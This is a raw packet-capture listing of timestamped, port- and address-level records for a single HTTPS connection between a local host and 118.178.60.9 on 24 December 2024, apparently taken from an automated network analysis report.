Dec 24, 2024 15:13:34.309778929 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.311717033 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.311769009 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.312655926 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.312715054 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.313473940 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.313519955 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.315433979 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.315480947 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.316545963 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.316596031 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.318180084 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.318229914 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.319128036 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.319190979 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.320518970 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.320574045 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.322088003 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.322144032 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.322932959 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.322981119 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.324548006 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.324604988 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.326474905 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.326534033 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.327161074 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.327231884 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.328721046 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.328767061 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.329574108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.329623938 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.331109047 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.331167936 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.333612919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.333668947 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.333749056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.333801985 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.335077047 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.335128069 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.336641073 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.336698055 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.337521076 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.337588072 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.338963985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.339025974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.340534925 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.340585947 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.341384888 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.341439009 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.345649958 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.493299007 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.493406057 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.494791985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.494860888 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.496023893 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.496085882 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.497513056 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.497572899 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.498927116 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.498986959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.500591040 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.500649929 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.501378059 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.501435995 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.502269983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.502325058 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.503756046 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.503810883 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.505341053 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.505397081 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.506854057 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.506905079 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.507807016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.507869959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.509188890 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.509249926 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.510785103 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.510837078 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.512326956 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.512379885 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.513113022 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.513166904 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.514703035 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.514760017 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.515620947 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.515676022 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.517023087 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.517077923 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.519100904 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.519155025 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.519762993 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.519818068 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.521426916 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.521481037 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.521902084 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.522316933 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.522367001 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.523675919 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.523731947 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.525310993 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.525366068 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.526278019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.526330948 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.527599096 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.527648926 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.529594898 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.529644966 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.529997110 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.530051947 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.531706095 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.531761885 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.533166885 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.533221006 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.686669111 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.686752081 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.687081099 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.687272072 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.688442945 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.688513994 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.689968109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.690027952 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.690932035 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.690988064 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.693149090 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.693209887 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.693905115 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.693965912 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.694811106 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.694869041 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.697249889 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.697309017 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.697793007 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.697850943 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.699369907 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.699429035 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.700306892 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.700366974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.701719999 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.701781988 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.703280926 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.703339100 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.704658985 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.704716921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.705672026 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.705734015 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.707240105 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.707298994 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.708784103 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.708842993 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.709911108 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.709964991 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.710798025 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.710860014 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.712151051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.712311983 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.712364912 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.713850975 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.713907003 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.714843035 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.714900970 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.716211081 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.716270924 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.717847109 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.717906952 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.719434023 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.719494104 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.720343113 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.720392942 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.721641064 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.721690893 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.723300934 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.723351002 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.724329948 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.724383116 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.725553989 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.725606918 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.726655006 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.726708889 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.879232883 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.879288912 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.879968882 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.880022049 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.880536079 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.880580902 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.882153988 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.882204056 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.883688927 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.883739948 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.884937048 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.884987116 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.886322975 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.886368036 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.887576103 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.887628078 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.889189959 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.889262915 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.889893055 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.889940977 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.891371012 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.891489029 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.891536951 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.893038034 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.893085003 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.893884897 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.893929005 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.895401001 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.895466089 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.896944046 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.896994114 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.897834063 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.897885084 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.900178909 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.900233030 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.901050091 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.901097059 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.901966095 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.902019024 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.903636932 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.903685093 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.904613018 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.904668093 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.905961037 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.906008959 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.907526016 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.907582998 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.908881903 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.908938885 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.910042048 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.910099030 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.911484003 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.911537886 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.912272930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.912332058 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.913908958 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.914031029 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.915385962 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.915446043 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.916193962 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.916250944 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.917941093 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.918004990 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.919291019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:34.919404984 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:34.962551117 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.071036100 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.071115971 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.072767019 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.072926044 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.073648930 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.073703051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.075062037 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.075115919 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.075886965 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.075937033 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.077713966 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.077771902 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.079227924 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.079272985 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.080662966 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.080712080 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.081410885 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.081459999 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.083091974 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.083142996 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.084266901 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.084316015 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.085491896 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.085537910 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.087001085 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.087048054 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.087852001 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.087894917 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.089643955 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.089690924 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.090945959 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.090987921 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.091670036 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.091716051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.093173027 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.093218088 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.094846964 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.094907999 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.095849037 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.095855951 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.095896006 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.097465038 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.097513914 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.099008083 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.099059105 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.100760937 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.100810051 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.101437092 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.101483107 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.102158070 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.102200031 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.103930950 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.103972912 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.105293989 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.105334044 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.106842995 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.106889009 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.108216047 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.108268976 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.109174967 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.109225035 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.110116005 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.110160112 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.111746073 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.111808062 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.263497114 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.263606071 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.265086889 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.265152931 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.266113997 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.266170979 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.267414093 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.267471075 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.269016981 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.269069910 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.269785881 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.269826889 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.271356106 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.271403074 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.273590088 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.273636103 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.274727106 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.274770975 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.276484013 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.276524067 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.277645111 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.277692080 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.278359890 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.278405905 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.279767990 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.279814005 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.281001091 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.281054974 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.282351971 CET	443	49807	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:35.282407045 CET	49807	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:35.283170938 CET	443	49807	118.178.60.9	192.168.2.4
